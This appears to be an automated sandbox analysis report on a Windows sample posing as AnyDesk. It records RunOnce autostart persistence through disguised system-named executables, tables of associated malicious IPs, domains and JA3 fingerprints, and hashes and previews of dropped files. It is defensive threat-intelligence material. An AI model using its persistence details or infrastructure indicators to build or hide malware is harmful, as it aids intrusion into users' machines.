                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      23:57:05API Interceptor109x Sleep call for process: svchost.exe modified
                                                                                                                                                      23:57:11API Interceptor382x Sleep call for process: explorer.exe modified
                                                                                                                                                      23:57:15AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\resources\themes\explorer.exe RO
                                                                                                                                                      23:57:18API Interceptor2x Sleep call for process: sj9q8uwmax.exe modified
                                                                                                                                                      23:57:23AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\resources\svchost.exe RO

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      92.223.88.41AnyDesk (5).exeGet hashmaliciousBrowse
                                                                                                                                                        AnyDesk (4).exeGet hashmaliciousBrowse
                                                                                                                                                          AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                            AnyDesk (1).exeGet hashmaliciousBrowse
                                                                                                                                                              Vostel-Anydesk.EXEGet hashmaliciousBrowse
                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                  49.12.130.236https://ms94.yolasite.com/Get hashmaliciousBrowse
                                                                                                                                                                    AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                      AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                        49.12.130.237AnyDesk (5).exeGet hashmaliciousBrowse
                                                                                                                                                                          AnyDesk (1).exeGet hashmaliciousBrowse
                                                                                                                                                                            handelsbankensupport.com-AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                              AnyDesk.exeGet hashmaliciousBrowse

                                                                                                                                                                                Domains

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                boot.net.anydesk.comhttp://anydesk.comGet hashmaliciousBrowse
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                https://ms94.yolasite.com/Get hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                AnyDesk (5).exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                AnyDesk (4).exeGet hashmaliciousBrowse
                                                                                                                                                                                • 195.181.174.167
                                                                                                                                                                                AnyDesk (3).exeGet hashmaliciousBrowse
                                                                                                                                                                                • 195.181.174.173
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 195.181.174.173
                                                                                                                                                                                AnyDeskUninst5265.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 92.223.88.232
                                                                                                                                                                                handelsbankensupport.com-AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.237

                                                                                                                                                                                ASNs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                GCOREATdYM5ol1Mx4Get hashmaliciousBrowse
                                                                                                                                                                                • 92.38.145.189
                                                                                                                                                                                http://info-getting-eu.comGet hashmaliciousBrowse
                                                                                                                                                                                • 92.223.124.254
                                                                                                                                                                                5fjZZ75ZIiGet hashmaliciousBrowse
                                                                                                                                                                                • 5.188.4.184
                                                                                                                                                                                PgyjFPUU5uGet hashmaliciousBrowse
                                                                                                                                                                                • 92.38.145.157
                                                                                                                                                                                https://novawealth.me/wp-content/suediaGet hashmaliciousBrowse
                                                                                                                                                                                • 92.223.127.141
                                                                                                                                                                                dJPWbHmILN.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 92.38.135.62
                                                                                                                                                                                dJPWbHmILN.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 92.38.135.62
                                                                                                                                                                                i9YeKJfeedGet hashmaliciousBrowse
                                                                                                                                                                                • 92.223.55.192
                                                                                                                                                                                kKH0R03ZoaGet hashmaliciousBrowse
                                                                                                                                                                                • 5.188.4.149
                                                                                                                                                                                armGet hashmaliciousBrowse
                                                                                                                                                                                • 5.188.4.155
                                                                                                                                                                                https://irinwellness.com/wp-content/colour/orange/empty/colour/orange/empty/newabdcolour/next.phpGet hashmaliciousBrowse
                                                                                                                                                                                • 185.12.242.33
                                                                                                                                                                                xd.armGet hashmaliciousBrowse
                                                                                                                                                                                • 92.38.145.160
                                                                                                                                                                                SBNGwWC7WbGet hashmaliciousBrowse
                                                                                                                                                                                • 92.38.145.170
                                                                                                                                                                                xWqX0SL1Sg.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 5.8.71.97
                                                                                                                                                                                https://heylink.me/gshdj/Get hashmaliciousBrowse
                                                                                                                                                                                • 185.12.242.35
                                                                                                                                                                                PINGPULL_HTTP.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 5.8.71.97
                                                                                                                                                                                arm7Get hashmaliciousBrowse
                                                                                                                                                                                • 92.38.145.186
                                                                                                                                                                                https://bullant-security.w3spaces.com/Get hashmaliciousBrowse
                                                                                                                                                                                • 92.223.124.254
                                                                                                                                                                                http://xopenload.pwGet hashmaliciousBrowse
                                                                                                                                                                                • 92.223.124.254
                                                                                                                                                                                04-12-22-0087976.docGet hashmaliciousBrowse
                                                                                                                                                                                • 92.38.178.11

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                c91bde19008eefabce276152ccd51457AnyDesk (5).exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk (4).exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk (3).exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDeskUninst5265.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                handelsbankensupport.com-AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk_ETS_WIN.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                YfbB61z87a.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39
                                                                                                                                                                                AnyDesk.exeGet hashmaliciousBrowse
                                                                                                                                                                                • 49.12.130.236
                                                                                                                                                                                • 49.12.130.237
                                                                                                                                                                                • 185.229.191.39

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x50ff5d0b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):786432
                                                                                                                                                                                Entropy (8bit):0.2507255342529854
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                MD5:69F5E4678F8719329AF3904F61EFDCC4
                                                                                                                                                                                SHA1:F11DEC0687A6A7E4EA5A0BF1DE260E7104A2DFE3
                                                                                                                                                                                SHA-256:25D86C34A3A39DD15624B35E24F09B4F6C4F505EB1CBF215B113AF5F0F32210A
                                                                                                                                                                                SHA-512:4D89B80BFF0DA0A344692C3454C873A2532BE7131BACE905D08A653EA9C92544E1DE4455A700EB3C81D6B4548238B797259D6F8CF22512A099BB5A3196781ED0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:P.].... ................e.f.3...w........................&..........w...9...z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................+.8..9...z.g................b.:.9...z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF1610AD0EF6C72DD2.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.0138474450443473
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXGFS/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQGFStfbltD7Ovf5
                                                                                                                                                                                MD5:257FA8889FB3A52D41A899309386D94C
                                                                                                                                                                                SHA1:7876C6E846A1E8B98FE4AB8E45D8A20C706FA4AF
                                                                                                                                                                                SHA-256:9246BE416AA4BD404FCDB26B668FE483CB3BBD000033A5D0E7B09E4C750AB36F
                                                                                                                                                                                SHA-512:C604E285B642C2DF8F4FF24E4A04EC10F694F04B83618C4AB3F23C5DFB47EEE44EC01AF299EECA74108838C89C31AA09E7B9E515A2A1D03C15D0A22B38C7C837
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF744899192DCD9BB4.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.0150719828554693
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXxslt9Xblt59Xh9XR5+1lf35X:rl3b/VFQSfbltD7Ovf5
                                                                                                                                                                                MD5:F5BE51E11DBE9CE68D2F045C974194DE
                                                                                                                                                                                SHA1:81C4865507955BDB63051EC8671AC247DD424A67
                                                                                                                                                                                SHA-256:C71BA5BB6671647150F70631359529F3482E45F01BE9F6C513CBF6E0BEFBDD13
                                                                                                                                                                                SHA-512:C28BCFA1DA5E4B7D2904CCB83E032FB3CD649E89D04678642424C28084FAACC97908B9CA386E848D05EA449223B825C361872A7D0C6D8FBCF1C6C5734C286AED
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF8D5525F3BF23B86C.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\icsys.icn.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.015427096491833
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXOlt9Xblt59Xh9XR5+1lf35X:rl3b/VFQKfbltD7Ovf5
                                                                                                                                                                                MD5:BCF7AFF0DA3C0D3EE38CEBB085362040
                                                                                                                                                                                SHA1:789459B18926426F29A541BED94EF0F3F95DE6E0
                                                                                                                                                                                SHA-256:16A01ABDA6AE4E75609316843E7F8A6229EADBFA47977EB5DB7A26F4750322DF
                                                                                                                                                                                SHA-512:86C80C4862A8DE73C8A53D8E34C2A245BDEFC1493F00F67E41D15F954F4C5BAB7A9F48D30591CAD0B712040534F46B857DD2503E8AE352775EC76510058137A1
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:low
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFEEC415210A380BCD.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.014361755582742
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXs9Flt9Xblt59Xh9XR5+1lf35X:rl3b/VFQcffbltD7Ovf5
                                                                                                                                                                                MD5:572512E04D2B908761A25BC009462CF4
                                                                                                                                                                                SHA1:F858F6CC1CE079D39E2AF2817D089F18BE1C34BF
                                                                                                                                                                                SHA-256:05958FB61A9A5BD571776B72F7D8F7E0A3DDDDA66C991B14C6058F8EFC641FEE
                                                                                                                                                                                SHA-512:82AC3F38EDA6D3FEDAAE9B9DE2EA0CD9F61492CA30CC44C747453CFA1671822255CD67BCE5F9D34FA2D73F867470E7E993B7A1636388B0FFCFA831337D9B75C2
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFF8E194D4D74C44E8.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.0150719828554693
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQXpilt9Xblt59Xh9XR5+1lf35X:rl3b/VFQIfbltD7Ovf5
                                                                                                                                                                                MD5:B4B9E9F7358A49899990677913D7988E
                                                                                                                                                                                SHA1:3E7F2D84A66A543A21690B0E2295F13374FCD5BB
                                                                                                                                                                                SHA-256:B6CB874BE6483E0007DFF9A335C4CE6693D60BE18F24466642C818C069B34D90
                                                                                                                                                                                SHA-512:2B8A2EFC8616B75EA68E019467A7FC2C253CF1B0FFFD9144320482124A67BF4E99E5E4DC167F28125A6E02E5BC776BE7DEC77FB921495F43DF71090F7D779D11
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFFE57A1C8066DBB5E.TMP

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sJ9Q8UWMAX.exe
                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5632
                                                                                                                                                                                Entropy (8bit):1.015427096491833
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:rl91bxbtg/Ul+CFQX8/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ8tfbltD7Ovf5
                                                                                                                                                                                MD5:2C110568CDEB0A26B47D610B1F57993D
                                                                                                                                                                                SHA1:E5406436410DE6B4B1E46B97ABCF3494E66303CE
                                                                                                                                                                                SHA-256:E8DDC4628D96D0BA9DB69397ACDAFADE8BCB3EA6B5EEB467B58144919290BBAF
                                                                                                                                                                                SHA-512:00C991C68D7CC55E854EC89ABFACD5016EF611BB8FD0287B825F6DC8FE59FC81522B88E8479253D68F746AE28518F836BA12D02196535C898B8DEA2DAEF308A7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\service.conf

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                Entropy (8bit):6.026349035077884
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:uISTisbiCBtvlwyPAVRPQKdj6HLD8qqTSulEfpiHNZ92ZLm+1WID212:uISTZiCBtPPeRPxde/8qq+ulEkHNZX+R
                                                                                                                                                                                MD5:D3CFC62A5048B8C5531BDA669451A8E2
                                                                                                                                                                                SHA1:C9719FEB583AFC9491BCDA413D20375CAECC5B51
                                                                                                                                                                                SHA-256:F01AB65F7DB4EDDCFE92A8CBD0780DDB2AEA62B7865B3F2DC11E65346ED8D6F4
                                                                                                                                                                                SHA-512:3536D6E2C20747AAF38C326A5A55641A6B113B15FB9010B63E7E76AEF405FC9EA60D147C02ED5E8822CC2AAC50E41BDBB418D2E62D454B692462EE1D73076559
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ad.anynet.cert=-----BEGIN CERTIFICATE-----\nMIICqDCCAZACAQEwDQYJKoZIhvcNAQELBQAwGTEXMBUGA1UEAwwOQW55RGVzayBD\nbGllbnQwIBcNMjIwNzE3MDY1NzA2WhgPMjA3MjA3MDQwNjU3MDZaMBkxFzAVBgNV\nBAMMDkFueURlc2sgQ2xpZW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC\nAQEA4Yiz0IqtdWGqyA7F7KGWvxEFcbU0z18461uplYxffF8sep2/3U4rxpbeE2nb\n5uTaL8T29HETKbceTtwbVSquRTrjf+x1xoyRRrbCUVtakYMrQC/DqOGpHqMHAOg1\ni1L5dt4bvYpaFE6H8URviyYy9NcIRmR4mJGpCa7SF6uQ9iXexbyW/g3QFMBLZWDv\nEw5/RrTNZ2B7eFq+drQubU6gPy8+1T3Ax4HjBYZFoZ6bqlBNUE+PeahWXB2KYaFP\nOwehTl67DBHyjtUUYWDGMlZTVFnUUJELXQSxeqU3geN+Kz0wLPK4sSulAhNtag9b\ndpB/NQcyIMylAE1JlrWmlQRm1QIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQB/Dghq\nG8rr/dYdeMZRmQxIYs9TMfwXOjozfe5C9URakg/lL/sxJpW/gZUSSyNRyvHxtMg5\nKXwZVsFUl2hYCMQNdSnk8pTmar49VtrJmBlDJYd6Jn35WiJeYN/8ahE1I8LdKb/h\nu5atwtKPw9WPdL/eKrWgVlmpt/HMyOp2VOhO6Hx9DrBfHgNzc6NZEinzzRLVBe+s\nk7bwvVEtw6/mkBKNxrlez58Qn9R//AN0Rv2VXyuURDnheMuETSg4Czqbunueh7/t\npUdaCbwkWwr3vjy0O6QeRLHoJlT6PKGEadmsqyoWQUuiQxhyhJ3ELT44GoDQy+rC\neNUyTnAqM0Mi3I8n\n-----END CERTI

                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\system.conf

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):395
                                                                                                                                                                                Entropy (8bit):4.550646416567168
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6:owD/DMWJcOMzo+raqQAmvbahOmQgRQUQgRQPYQgRQOYQgfxPZxi3B6QgfxPg3qg3:o0MWJctXmqQHvWhOLroBGgFBGA
                                                                                                                                                                                MD5:70C3EEFDFBBA4140FCF628059A5F4584
                                                                                                                                                                                SHA1:5AEAFA2E9C111D9E474F2F9647F171F39A5EFBD6
                                                                                                                                                                                SHA-256:5772F9CBEFF7585AAACBF776CB37EC9B9D99463F52790E909BC352633FD72278
                                                                                                                                                                                SHA-512:5265EDAE9B92CFE48F1915316A33DD6FFB9E197F1560B13D99306B57784312CC982D27F98822696A66A166BCF9B400C5474AEFC6AD3F5592F58735A973A0FA44
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ad.anynet.fpr=404b2696203e0596eef53d9df1a930c68df166d4.ad.anynet.relay.fatal_result=1.0.ad.anynet.relay.state=0.ad.security.frontend_clipboard=1.ad.security.frontend_clipboard_files=1.ad.security.frontend_clipboard_version=1.ad.security.permission_profiles._default.permissions.sas=1.ad.security.permission_profiles._unattended_access.permissions.sas=1.ad.security.permission_profiles.version=1.

                                                                                                                                                                                C:\Users\user\AppData\Roaming\AnyDesk\user.conf

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1158
                                                                                                                                                                                Entropy (8bit):4.559621408130901
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:snKw0XoKXVVxU4ThHhgCtXenKw0XkUnTFVlPJr/pOlA5lL/6:snXgRjtenvgTxoMlLC
                                                                                                                                                                                MD5:329E5D9D173516659F86B6A3396647AE
                                                                                                                                                                                SHA1:AD3EB2877CBBAF3BA77D11BBB70D154B90B3CE0D
                                                                                                                                                                                SHA-256:CD6B73BDA680A3867B89B0522B120D9476A1FCD59644F0A136787BE409A6434E
                                                                                                                                                                                SHA-512:D62CBD889E9464E6F52B80F09EAA26727AAB2267EF7330B0514C74C66D984C981C4E7B5A641E11E8C2952161F118625D31BF3176E321B56F5AF80F3F6AEB00A4
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ad.invite.created_list_encrypted=6fa74c609a01f31f1f670668df954f4642a4aae8018a18dace6e7ff197dadefbaefc898a49d9c7f10bf648310f1fa2df0b53d2e90e4e008262013ecaea926c08e47680ab18934a0678562d90d8959639f8d86e572d4ffe537634ef202b50c27374ab0862b47b212f41cf5778b89cce4556a6619866d1f52a4f0fffa249b0df64dda5e4a34c5b186110cc3c076a2b5470f0d9ba1ed944f230acdedab555f05ebea119806804e98f658479de8c8eab54fca87b8eb0caf531ba376f557f2efd95347624ee6daace821f6cc514cbe00bdfa1426127374cb8a6f2a57aa16524548726c72c9aee2d71.ad.invite.received_list_encrypted=6fa74c609a01f31f1f670668df954f4642a4aae8018a18dace6e7ff197dadefbaefc898a49d9c7f10bf648310f1fa2df0b53d2e90e4e008262013ecaea9230200c53c878299fd5ebb1199458147b80156cfc7e83aeca9c50d7288bb245d5c27374ab0862b47b212f41cf5778b89c71dce2cb62b1a97274b157c1206cc0d78b0ee019d528434fabc926bd9fee27ff5470f0d9671c56c7be77aee262fd62109603a6da806804e93a2b5d208fcaf6ebb7202cb21d4bea2035bd8bb3805a0ffcddfefa23796b6c873ec70d9867c3a717fc3e008cb290bedc28beca60837d8aef6d8515cefb181be3.ad.roster.c

                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64ISL0FR01IFOK9S75OC.temp

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3252
                                                                                                                                                                                Entropy (8bit):3.343541104275968
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:2UJcJJ88vNdLwd+oySUJtJJ89aNdLwd/yH:NJWrkdMJlxkdy
                                                                                                                                                                                MD5:F3719467AA20F82E1F26FF64BA9D3FF9
                                                                                                                                                                                SHA1:1628BA894CEBCAD262E33C2BDD1087F755D9BB80
                                                                                                                                                                                SHA-256:4837E903400AFF13E4C7479BA96B50F5E4102D497985E82BF15D93F82703FAD6
                                                                                                                                                                                SHA-512:2F7B7237B56E04BB410B0A9CCAC2EBFD285B6985F16774928E05CE02ECEDC5D5409A25854AC786A9DEEDFF1AD8D10AB59246E7CD370CC9883D25419F77A78C87
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:...................................FL..................F.@..&......].....Q._......]......:..........................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-.....]......c......l.2...:..T.7&.SJ9Q8U~2.EXE..P.......T.7.T.7..........................'...s.j.9.q.8.u.w.m.a.x...e.x.e.........V...............-.......U............ r......C:\Users\user\Desktop\sj9q8uwmax.exe.....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w...'.c.:.\.u.s.e.r.s.\.a.l.f.o.n.s.\.d.e.s.k.t.o.p.\.s.j.9.q.8.u.w.m.a.x...e.x.e...........%USERPROFILE%\desktop\sj9q8uwmax.exe................................................................................................................................................................................................................................%.U.S.E.R.P.R.O.F.I.L.E.%.\.d.e.s.k.t.o.p.\.s.j.9.q.8.u.w.m.a.x...e.x.e...........................................................................................................................................

                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\75fdacd8330bac18.customDestinations-ms (copy)

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3252
                                                                                                                                                                                Entropy (8bit):3.3415004321854416
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:xEhJtJJ88vNdLwd+oyNEhJtJJ89aNdLwd/yH:xMJlrkdaMJlxkdy
                                                                                                                                                                                MD5:7B50062F2C00880F8CCCA5844C01F5F0
                                                                                                                                                                                SHA1:B5DDADFFF043EE502FF6FCD97CC3E0AC897D0439
                                                                                                                                                                                SHA-256:A71ECB1F3B9B08C790125030D0A619B478708F2C130CA846283E07195FDED34A
                                                                                                                                                                                SHA-512:9A4EDEFFCF7FA53A0DF9F7F34D472364CE1E9518381CCE1857D73DF52A13EBC45C5B50D02FA92828D651B1B0AE3F36B5889F85EC823FDA0C5DE16E85B16961F0
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:...................................FL..................F.@..&......].......i......]......:..........................P.O. .:i.....+00.:...:..,.LB.)...A&...&..........-.....]......c......l.2...:..T.7&.SJ9Q8U~2.EXE..P.......T.7.T.7..........................'...s.j.9.q.8.u.w.m.a.x...e.x.e.........V...............-.......U............ r......C:\Users\user\Desktop\sj9q8uwmax.exe.....O.p.e.n. .a. .n.e.w. .A.n.y.D.e.s.k. .w.i.n.d.o.w...'.c.:.\.u.s.e.r.s.\.a.l.f.o.n.s.\.d.e.s.k.t.o.p.\.s.j.9.q.8.u.w.m.a.x...e.x.e...........%USERPROFILE%\desktop\sj9q8uwmax.exe................................................................................................................................................................................................................................%.U.S.E.R.P.R.O.F.I.L.E.%.\.d.e.s.k.t.o.p.\.s.j.9.q.8.u.w.m.a.x...e.x.e...........................................................................................................................................

